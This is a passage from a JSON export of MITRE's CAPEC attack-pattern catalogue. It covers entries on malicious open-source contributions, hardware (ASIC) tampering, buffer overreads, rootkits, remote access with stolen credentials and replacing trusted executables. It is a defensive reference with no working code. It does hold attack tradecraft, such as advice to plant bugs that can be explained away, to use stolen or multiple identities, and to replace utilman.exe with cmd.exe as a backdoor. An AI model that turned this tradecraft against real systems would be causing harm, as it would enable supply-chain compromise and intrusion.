criteria:",{"div":{"style":"margin-left:10px;","ul":{"li":["The open-source code currently in use on a selected target system.","The depth in the dependency graph of the open source code in relationship to other code bases in use on the target system. Choosing an OSS lower in the graph decreases the probability of discovery, but also decreases the scope of its use within the target system.","The programming language in which the open source code is implemented. Different languages present different opportunities for using known software weaknesses.","The quality of processes in place to make a contribution. For instance, some contribution sites use static and dynamic analysis tools, which could increase the probability of discovery.","The security requirements necessary to make a contribution. For instance, is the ownership lax allowing unsigned commits or anonymous users."]}}}]},{"Step":"2","Phase":"Experiment","Description":["[Develop a plan for malicious contribution] The adversary develops a plan to contribute malicious code, taking the following into consideration:",{"div":{"style":"margin-left:10px;","ul":{"li":["The adversary will probably avoid easy-to-find software weaknesses, especially ones that static and dynamic analysis tools are likely to discover.","Common coding errors or missing edge cases of the algorithm, which can be explained away as being accidental, if discovered, will be preferred by the adversary.","Sometimes no identity is required to make a contribution. Other options are to steal an existing identity or create one. When creating a new identity, strike a balance between too little or too much detail. Using an stolen identity could cause a notification to be sent to the actual user."]}}}]},{"Step":"3","Phase":"Exploit","Description":"[Execute the plan for malicious contribution] Write the code to be contributed based on the plan and then submit the contribution. Multiple commits, possibly using multiple identities, will help obscure the attack. Monitor the contribution site to try to determine if the code has been uploaded to the target system."}]},"Prerequisites":{"Prerequisite":"Access to the open source code base being used by the manufacturer in a system being developed or currently deployed at a victim location."},"Skills_Required":{"Skill":["Advanced knowledge about the inclusion and specific usage of an open source code project within system being targeted for infiltration.",{"Level":"High"}]},"Example_Instances":{"Example":"An adversary with access to an open source code project introduces a hard-to-find bug in the software that allows under very specific conditions for encryption to be disabled on data streams. The adversary commits the change to the code which is picked up by a manufacturer who develops VPN software. It is eventually deployed at the victim\'s location where the very specific conditions are met giving the adversary the ability to sniff plaintext traffic thought to be encrypted. This can provide to the adversary access to sensitive data of the victim."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description, Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated @Name, Description, Example_Instances, Execution_Flow, Related_Attack_Patterns"}],"Previous_Entry_Name":["Open Source Libraries Altered",{"Date":"2021-06-24"}]}},"539":{"ID":"539","Name":"ASIC With Malicious Functionality","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to the development environment process of an application-specific integrated circuit (ASIC) for a victim system being developed or maintained after initial deployment can insert malicious functionality into the system for the purpose of disruption or further compromise.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":["The attacker must have working knowledge of some if not all of the components involved in the target system as well as the infrastructure and development environment of the manufacturer.","Advanced knowledge about the ASIC installed within the target system."]},"Skills_Required":{"Skill":["Able to develop and manufacture malicious subroutines for an ASIC environment without degradation of existing functions and processes.",{"Level":"High"}]},"Example_Instances":{"Example":"A hardware manufacturer periodically updates its ASIC with new features. The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for ASIC design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent ASIC development system. The attacker is then able to exfiltrate and alter sensitive data on the ASIC system, allowing for future compromise once a new AISC is deployed at the victim location."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"540":{"ID":"540","Name":"Overread Buffers","Abstraction":"Standard","Status":"Draft","Description":"An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"123"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overread on. Adversaries often look for applications that accept user input and that perform manual memory management."},{"Step":"2","Phase":"Experiment","Description":"[Find attack vector] The adversary identifies an attack vector by looking for areas in the application where they can specify to read more data than is required."},{"Step":"3","Phase":"Exploit","Description":"[Overread the buffer] The adversary provides input to the application that gets it to read past the bounds of a buffer, possibly revealing sensitive information that was not intended to be given to the adversary."}]},"Prerequisites":{"Prerequisite":"For this type of attack to be successful, a few prerequisites must be met. First, the targeted software must be written in a language that enables fine grained buffer control. (e.g., c, c++) Second, the targeted software must actually perform buffer operations and inadequately perform bounds-checking on those buffer operations. Finally, the adversary must have the capability to influence the input that guides these buffer operations."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"By reading outside the boundary of the intended buffer, the adversary is potentially able to see any data that is stored on the disk. This could include secret keys, personal information, and sensitive files."},{"Scope":"Availability","Impact":"Unreliable Execution","Note":"Depending on the use of the target buffer, an application or system crash can be achieved."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"125"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}}},"541":{"ID":"541","Name":"Application Fingerprinting","Abstraction":"Standard","Status":"Draft","Description":"An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"224"}},"Prerequisites":{"Prerequisite":"None"},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"542":{"ID":"542","Name":"Targeted Malware","Abstraction":"Standard","Status":"Draft","Description":"An adversary develops targeted malware that takes advantage of a known vulnerability in an organizational information technology environment. The malware crafted for these attacks is based specifically on information gathered about the technology environment. Successfully executing the malware enables an adversary to achieve a wide variety of negative technical impacts.","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"549"},{"Nature":"CanPrecede","CAPEC_ID":"662"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"543":{"ID":"543","Name":"Counterfeit Websites","Abstraction":"Detailed","Status":"Draft","Description":"Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"194","Exclude_Related":{"Exclude_ID":"513"}},{"Nature":"CanPrecede","CAPEC_ID":"89"}]},"Prerequisites":{"Prerequisite":"None"},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"544":{"ID":"544","Name":"Counterfeit Organizations","Abstraction":"Detailed","Status":"Draft","Description":"An adversary creates a false front organizations with the appearance of a legitimate supplier in the critical life cycle path that then injects corrupted/malicious information system components into the organizational supply chain.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"194","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":"None"},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"545":{"ID":"545","Name":"Pull Data from System Resources","Abstraction":"Standard","Status":"Draft","Description":"An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"116","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"437"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1239"},{"CWE_ID":"1243"},{"CWE_ID":"1258"},{"CWE_ID":"1266"},{"CWE_ID":"1272"},{"CWE_ID":"1278"},{"CWE_ID":"1323"},{"CWE_ID":"1324"},{"CWE_ID":"1258"},{"CWE_ID":"1330"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1555.001","Entry_Name":"Credentials from Password Stores:Keychain"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1005","Entry_Name":"Data from Local System"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}],"Previous_Entry_Name":["Probe Application Queries",{"Date":"2015-11-09"}]}},"546":{"ID":"546","Name":"Incomplete Data Deletion in a Multi-Tenant Environment","Abstraction":"Detailed","Status":"Draft","Description":"An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants\' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"545"}},"Prerequisites":{"Prerequisite":"The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system."},"Skills_Required":{"Skill":["The adversary requires the ability to traverse directory structure.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"A successful attack that probes application memory will compromise the confidentiality of that data."}},"Mitigations":{"Mitigation":["Cloud providers should completely delete data to render it irrecoverable and inaccessible from any layer and component of infrastructure resources.","Deletion of data should be completed promptly when requested."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"284"},{"CWE_ID":"1266"},{"CWE_ID":"1272"}]},"References":{"Reference":{"External_Reference_ID":"REF-461"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Name"}],"Previous_Entry_Name":["Probe Application Memory",{"Date":"2021-10-21"}]}},"547":{"ID":"547","Name":"Physical Destruction of Device or Component","Abstraction":"Standard","Status":"Draft","Description":"An adversary conducts a physical attack a device or component, destroying it such that it no longer functions as intended.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"607","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"},{"Exclude_ID":"403"}]}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"548":{"ID":"548","Name":"Contaminate Resource","Abstraction":"Meta","Status":"Draft","Description":"An adversary contaminates organizational information systems (including devices and networks) by causing them to handle information of a classification/sensitivity for which they have not been authorized. The information is exposed to individuals who are not authorized access to such information, and the information system, device, or network is unavailable while the spill is investigated and mitigated.","Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"549":{"ID":"549","Name":"Local Execution of Code","Abstraction":"Meta","Status":"Stable","Description":"An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Prerequisites":{"Prerequisite":"Knowledge of the target system\'s vulnerabilities that can be capitalized on with malicious code.The adversary must be able to place the malicious code on the target system."},"Resources_Required":{"Resource":"The means by which the adversary intends to place the malicious code on the system dictates the tools required. For example, suppose the adversary wishes to leverage social engineering and convince a legitimate user to open a malicious file attached to a seemingly legitimate email. In this case, the adversary might require a tool capable of wrapping malicious code into an innocuous filetype (e.g., PDF, .doc, etc.)"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely."}]},"Mitigations":{"Mitigation":["Employ robust cybersecurity training for all employees.","Implement system antivirus software that scans all attachments before opening them.","Regularly patch all software.","Execute all suspicious files in a sandbox environment."]},"Example_Instances":{"Example":"BlueBorne refers to a set of nine vulnerabilities on different platforms (Linux, Windows, Android, iOS) that offer an adversary the ability to install and execute malicious code on a system if they were close in proximity to a Bluetooth enabled device. One vulnerability affecting iOS versions 7 through 9 allowed an attacker to overflow the Low Energy Audio Protocol since commands sent over this protocol are improperly validated and gain the elevated permissions of the Bluetooth stack. These vulnerabilities were a result of poor validation and were patched shortly after their exposure in 2017, but many non-updated devices remain vulnerable."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Methods_of_Attack, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances"}]}},"550":{"ID":"550","Name":"Install New Service","Abstraction":"Detailed","Status":"Draft","Description":"When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. Services are usually run with elevated privileges.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Limit privileges of user accounts so new service creation can only be performed by authorized administrators."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.002","Entry_Name":"Create or Modify System Process:Systemd Service"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.003","Entry_Name":"Create or Modify System Process:Windows Service"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.004","Entry_Name":"Create or Modify System Process:Launch Daemon"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"551":{"ID":"551","Name":"Modify Existing Service","Abstraction":"Detailed","Status":"Draft","Description":"When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Limit privileges of user accounts so service changes can only be performed by authorized administrators. Also monitor any service changes that may occur inadvertently."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"284"},{"CWE_ID":"522"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.002","Entry_Name":"Create or Modify System Process:Systemd Service"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.003","Entry_Name":"Create or Modify System Process:Windows Service"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.004","Entry_Name":"Create or Modify System Process:Launch Daemon"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"552":{"ID":"552","Name":"Install Rootkit ","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Prevent adversary access to privileged accounts necessary to install rootkits."},"Example_Instances":{"Example":["A rootkit may take the form of a hypervisor. A hypervisor is a software layer that sits between the operating system and the processor. It presents a virtual running environment to the operating system. An example of a common hypervisor is Xen. Because a hypervisor operates at a level below the operating system it can hide its existence from the operating system.","Similar to a rootkit, a bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1014","Entry_Name":"Rootkit"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1542.003","Entry_Name":"Pre-OS Boot:Bootkit"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1547.006","Entry_Name":"Boot or Logon Autostart Execution:Kernel Modules and Extensions"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"554":{"ID":"554","Name":"Functionality Bypass","Abstraction":"Meta","Status":"Draft","Description":"An adversary attacks a system by bypassing some or all functionality intended to protect it. Often, a system user will think that protection is in place, but the functionality behind those protections has been disabled by the adversary.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"424"},{"CWE_ID":"1299"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-12-07"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"555":{"ID":"555","Name":"Remote Services with Stolen Credentials","Abstraction":"Standard","Status":"Stable","Description":"This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"560","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"151"}]},"Mitigations":{"Mitigation":"Disable RDP, telnet, SSH and enable firewall rules to block such traffic. Limit users and accounts that have remote interactive login access. Remove the Local Administrators group from the list of groups allowed to login through RDP. Limit remote user permissions. Use remote desktop gateways and multifactor authentication for remote logins."},"Example_Instances":{"Example":["Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.","Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"294"},{"CWE_ID":"263"},{"CWE_ID":"262"},{"CWE_ID":"521"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1114.002","Entry_Name":"Email Collection:Remote Email Collection"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1021","Entry_Name":"Remote Services"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1133","Entry_Name":"External Remote Services"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, References, Related_Weaknesses, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"}]}},"556":{"ID":"556","Name":"Replace File Extension Handlers","Abstraction":"Detailed","Status":"Draft","Description":"When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. Applications can modify the file handler for a given file extension to call an arbitrary program when a file with the given extension is opened.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Inspect registry for changes. Limit privileges of user accounts so changes to default file handlers can only be performed by authorized administrators."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1546.001","Entry_Name":"Event Triggered Execution:Change Default File Association"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"558":{"ID":"558","Name":"Replace Trusted Executable","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits weaknesses in privilege management or access control to replace a trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Example_Instances":{"Example":"Specific versions of Windows contain accessibility features that may be launched with a key combination before a user has logged in (for example when they are on the Windows Logon screen). On Windows XP and Windows Server 2003/R2, the program (e.g. \\"C:\\\\Windows\\\\System32\\\\utilman.exe\\") may be replaced with cmd.exe (or another program that provides backdoor access). Then pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over RDP will cause the replaced file to be executed with SYSTEM 